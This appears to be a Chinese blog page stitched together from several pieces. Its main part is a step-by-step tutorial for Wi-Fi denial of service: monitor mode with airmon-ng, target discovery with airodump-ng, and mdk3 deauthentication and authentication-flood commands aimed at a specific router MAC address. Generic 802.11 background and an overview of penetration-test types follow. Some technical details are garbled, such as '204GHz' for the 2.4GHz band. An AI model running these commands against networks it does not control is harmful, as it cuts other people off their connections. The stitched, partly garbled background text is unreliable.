网络渗透攻击技术_无线网络渗透攻击

hacker|
205

wifi渗透:DOS路由器,让坏蛋们断网2.0

上一篇用的是aireplay-ng来实施的DOS攻击,他是Aircrack下的一个命令,事实上还有一些办法,通过arp攻击也可以让他断网,可那就不是dos攻击手法了。这次的测试环境与上次一样, 这篇文章中现在只有第一种攻击方式有效,下面两种了解一下就可以了。

来看一下通过路由器上网前与路由器的验证过程

1.用虚拟机连接上网卡

2.输入ifconfig,查看是否挂载成功

出现wlan0即为挂载成功

3.输入airmon-ng start wlan0,调为监听模式

4.输入ifconfig查看是否成功

若最后一个wlan0变为wlan0mon即为成功

5.使用airodump-ng wlan0mon 查看周围无线路由器情况

记录受害者的BSSID,CH

6.mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2]

其中各参数详情:

d:表示的是deauthentication/disassociation攻击模式

-c:针对的是无线网络工作频道,这里选择为4,我的测试路由器为@PHICOMM_10

-w:file白名单模式,w就是白名单的简写,即后跟文件中包含AP的MAC会在攻击中回避

-b:file黑名单模式,b就是黑名单的简写,即后跟预攻击目标AP的MAC列表

此时我输入mdk3 wlan0mon d -c 4

虽然看起来没什么反应,但实际上我的手机已经连接不上wifi了

注意:这里的攻击不对网线连接的客户端起作用,仅仅是对无线设备管用,而且只能是范围比较近的路由器起作用,前面的aireplay也是有一定范围限制的。

在无线路由器或者接入点内置一个列表即为连接状态表,里面可显示出所有与该AP建立连接的无线客户端状态。它试图通过利用大量模仿和伪造的无线客户端关联来填充AP的客户端关联表,从而达到淹没AP的目的。

由于开放身份验证(空身份验证)允许任何客户端通过身份验证后关联。利用这种漏洞的攻击者可以通过创建多个到达已连接或已关联的客户端来模仿很多客户端,从而淹没目标AP的客户端关联表。

攻击步骤:

简化一点,简化一点。

才开始的都一样,就最后一点不一样,刚刚是mdk3 wlan0mon d -c 4

4为信道,d为deauth攻击模式,-c为指定信道

现在是mdk3 wlan0mon a -a D8:C8:E9:1B:59:18

查看攻击效果

事实证明丝毫不受影响,但这只是我的斐讯路由器,不知道你们的是否管用

虽然不管用了,但这种空验证的攻击手法还是需要知道,毕竟有时候逛论坛仿佛看天书一样就很不爽了。

其中:

a:表示的是authentication DOS模式

-a:攻击指定的AP(路由器),此处输入的是AP的MAC地址

-s:发送数据包速率

当攻击成功后,指定的AP会有很多的不存在的无线站点与之联系。

与二相同,也是除最后一条命令不同外其余均相同

输入 mdk3 wlan0mon a -a D8:C8:E9:1B:59:18

手机畅行无阻。同样已经不管什么卵用了。

现在在与路由器的身份验证过程中,空连接等已经不管用了。

无线网络-渗透基础知识 概述

最主要部分: 路由器+客户端 ( AP(Access Point) + STA(Station) )

具体工作流程包括4个步骤:

🚥 . 由于AP 会定时地广播SSID,所以STA可监听到AP 发出的信号。当STA 加入无线网络时,会发送一个探测请求。当AP 收到该请求之后,回应一个含频带信息的响应包。此时,STA 会切换到指定的频带。

🥂 . STA 提供密码,以认证该无线网络。当AP 对STA 提供的认证信息确认正确后,即允许STA 接入无线网络。

🌄 . STA 和 AP 建立关联。在关联过程中,STA 与AP 之间要根据信号的强弱协商速率,直至关联成功。其中,一个STA 同时只能和一个AP 关联。

🏹 . 最后, STA 和 AP 能进行数据收发了

过程如下图所示:

❗ 如果要进行无线网络渗透,必需了解它的协议标准

😲 802.11 是 IEEE 最初制定的一个无线局域网标准,也是在无线 局域网领域内的第一个国际认可的协议。主要用于解决办公室局域网和校园网中用户与用户终端的无线接入。速率最高只能达到2Mbps.

由于最初速率并不能满足 🧑人们的需要, IEEE 又推出了 802.11b 和 802.11a两个标准,主要差距在 MAC 子层和 物理层

📢📢📢 协议表

802.11n 的继承者。 是在 802.11a标准上建立起来的,包括使用802.11ac的 5GHz 频段。 其每个通道的工作频宽将由 802.11n的 40MHz 提升到 80MHz,甚至是160MHz,再加上大约10%的实际频率调制效率提升,最终理论传输速率将跃升至1Gbps。实际传输率可以在300Mbps ~ 400Mbps之间,接近目前802.11n的实际传输速率3倍,足以在一条信道上同时传输多路压缩视频流。

204GHz 频段的频率范围是 2.4~2.4835GHz 。为了充分利用这个频段,将该范围分为几部分。每部分称为一个 信道。但是他们的 中心频率不同。而且也会有些边缘频率出现重叠的状况。一般分为13个信道

📡📡📡另外的这里补充一点, 带宽是调制载波占据的频率范围,也是发送无线信号频率的标准。

【网络安全知识】网络渗透测试分为几种类型?

作为最常见、也是最热门的渗透测试方法,网络渗透测试能够协助安全测试人员检测和发掘网络系统以及各种基础设施中的潜在漏洞。网络渗透测试通常分为外部、内部和无线三种类型。具体请看下文:

外部网络渗透测试

外部网络渗透测试可以帮助我们探索网络系统对于外部威胁的响应能力。此类测试最常见的手段是,通过基于互联网的渗透测试,以识别出那些暴露在外部网络中,却属于系统内部的漏洞和弱点。

此类测试通常会针对防火墙的配置、防火墙的绕过、IPS的欺骗以及DNS级别的毒化攻击等网络攻击。为了实现自动化漏洞扫描的测试过程,安全人员往往会使用市面上常见的知名工具,去扫描和检测目标系统中的已知漏洞。当然,他们也会将手动利用技术与自动化工具相结合,针对检测到的漏洞弱点,发动模拟攻击,并旨在完全接管那些面向互联网的系统。

内部网络渗透测试

此类测试旨在通过漏洞扫描,检测并识别内部系统,发现基础设施中的网络安全弱点,进而采用各种利用技术,来查看内部系统的响应行为。内部网络渗透测试会从根本上去评估内部系统、以及组织员工遭受未授权、或恶意攻击的可能性。其中包括:潜在的未经授权的访问,个人信息与信任凭据的泄漏等方面。

无线渗透测试

黑客或攻击者通过无线的方式,渗透进目标系统,在威胁内网安全的同时,利用获取到的特权,去访问各类敏感信息,进而对系统的正常运行造成不利的影响。

0条大神的评论

发表评论